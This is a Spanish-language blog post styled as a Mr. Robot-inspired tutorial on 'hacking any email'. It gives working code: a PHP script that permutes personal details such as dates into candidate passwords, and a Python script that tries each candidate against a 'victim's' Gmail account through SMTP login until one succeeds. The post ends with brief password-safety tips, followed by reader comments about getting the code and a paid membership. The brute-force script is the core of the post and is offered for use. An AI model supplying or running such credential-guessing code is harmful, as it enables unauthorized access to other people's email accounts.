Hackeando cualquier correo electrónico como en MR.ROBOT – HackWise EP4
En el episodio S01EP01 de la serie de Mr.robot observamos como hackea a su psiquiatra Krista accediendo a su correo electrónico para conocer un poco más acerca de su vida. En esta ocasión analizamos y realizamos los códigos necesarios para poder crear la herramienta mepscrk.py (Mr.Ebola Password cracker) inspirada en el episodio de Mr.robot
En la serie se ve que utilizan la herramienta ELPSCRK. (ELliot’s PaSsword CRacKer) de la siguiente manera:
elpscrk -list pswList.list-add Dylan; June 3rd, Stonehenge
Video – Hackeando cualquier correo electrónico como en MR.ROBOT:
Código de ELPSCRK. (ELliot’s PaSsword CRacKer):
Como podemos observar elpscrk, permite ingresar una lista de argumentos para que el sistema calcule contraseñas en base a esa información.
Lo primero que necesitaremos es crear g3n3r4t0r.php el cual nos permitirá generar posibles contraseñas con la información que demos de alta en el arreglo $arr, en este ejemplo ingresamos ’09’, ’08’, ‘1986’.
<?php
function pc_permute($items, $perms = array()) {
if (empty($items)) {
echo join('', $perms) . "<br/>";
} else {
for ($i = count($items) - 1; $i >= 0; --$i) {
$newitems = $items;
$newperms = $perms;
list($foo) = array_splice($newitems, $i, 1);
array_unshift($newperms, $foo);
pc_permute($newitems, $newperms);
}
}
}
$arr = array('09', '08', '1986');
pc_permute($arr);
?>
<!--
09 08 1986
09 1986 08
08 09 1986
08 1986 09
1986 08 09
1986 09 08
-->
Una vez que generamos todas las posibles contraseñas, pasamos a crear mepscrk.py el Mr.Ebola Password cracker que nos permitirá intentar conectar con el servicio smtp.gmail.com por el puerto 587. El sistema intentara contraseña por contraseña almacenada en pswd.list hasta dar con la correcta.
# ___. .__
# ____________ ____\_ |__ ____ | | _____
# / \_ __ \ _/ __ \| __ \ / _ \| | \__ \
# | Y Y \ | \/ \ ___/| \_\ ( <_> ) |__/ __ \_
# |__|_| /__| /\___ >___ /\____/|____(____ /
# \/ \/ \/ \/ \/
# .___
# ___________ ______ ________ _ _____________ __| _/
# \____ \__ \ / ___// ___/\ \/ \/ / _ \_ __ \/ __ |
# | |_> > __ \_\___ \ \___ \ \ ( <_> ) | \/ /_/ |
# | __(____ /____ >____ > \/\_/ \____/|__| \____ |
# |__| \/ \/ \/ \/
# __
# ________________ ____ | | __ ___________
# _/ ___\_ __ \__ \ _/ ___\| |/ // __ \_ __ \
# \ \___| | \// __ \\ \___| <\ ___/| | \/
# \___ >__| (____ /\___ >__|_ \\___ >__|
# \/ \/ \/ \/ \/
import smtplib
class bcolors:
OK = '\033[92m'
FAIL = '\033[91m'
BOLD = '\033[1m'
ENDC = '\033[0m'
UNDERLINE = '\033[4m'
smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()
print bcolors.BOLD + "Welcome to, mr.ebola Email Cracker based on MR.ROBOT - S01E01 11m03s" + bcolors.ENDC
print bcolors.BOLD + "TRYING WITH PASSWORDS IN: psw.list" + bcolors.ENDC
user = raw_input("Enter the victim's email address: ")
passwfile = "psw.list"
passwfile = open(passwfile, "r")
for password in passwfile:
try:
smtpserver.login(user, password)
print bcolors.UNDERLINE + "Password Found: %s" % password + bcolors.ENDC
break;
except smtplib.SMTPAuthenticationError:
print bcolors.FAIL + "Password Incorrect: %s" % password + bcolors.ENDC
El contenido del archivo psw.list deberá contener algo como esto, respetando el salto de linea para que mepscrk.py funcione correctamente.
09081986 09198608 08091986 08198609 19860809 19860908
De encontrar la contraseña veremos la siguiente pantalla:
Tips para evitar este tipo de ataque:
#1 Contraseña dificil de adivinar
No utilices datos personales en tu contraseña
#2 Contraseña segura
Una contraseña segura hoy en día suele ser una contraseña alfa numérica, con números o letras de mínimo 8 dígitos y con por lo menos algún carácter especial.
#3 Autenticación de dos pasos
La idea consiste en ingresar algo que solo tu conoces (Una contraseña) más algo que tu tienes (Código generado desde tu celular) para ingresar a tu correo.
Espero que les haya gustado este episodio de HackWise, no olviden suscribirse a el canal en youtube aquí y seguirme en todas mis redes sociales.
¿Tienes alguna mejor idea para realizar esto? Comentas en este post !
Hasta la próxima 😀
11 thoughts on "Hackeando cualquier correo electrónico como en MR.ROBOT – HackWise EP4"
Lo siento, debes estar conectado para publicar un comentario.
y en donde lo descargamos?
Los códigos están disponibles en está página, no son descargables, son scripts que tienes que utilizar en tu computadora.
El codigo.. sta completo?
Así es, el código está disponible para miembros
hola puse a prueba la herramienta y en el archivo .lisp añadi la contraseña correcta y arroja todas como incorrectas alguien sabe porque pasa eso
si compro la membresia en el video enseñas como usar los codigos y hacer el proceso ?
donde has conseguido esas letras de mr ebola password cracker dimelo porfavor
Hola, me hice una cuenta y me sigue saliendo esto:
“Este contenido se encuentra protegido
Disponible solo para usuarios con membresía Wiser Elite, Adquiere tu mebresía aquí.”
¿Qué puedo hacer? 🙁
comprar la membrensia x 150 pesos
Y el codigo? Donde esta?
y si el password es de numeros y letras?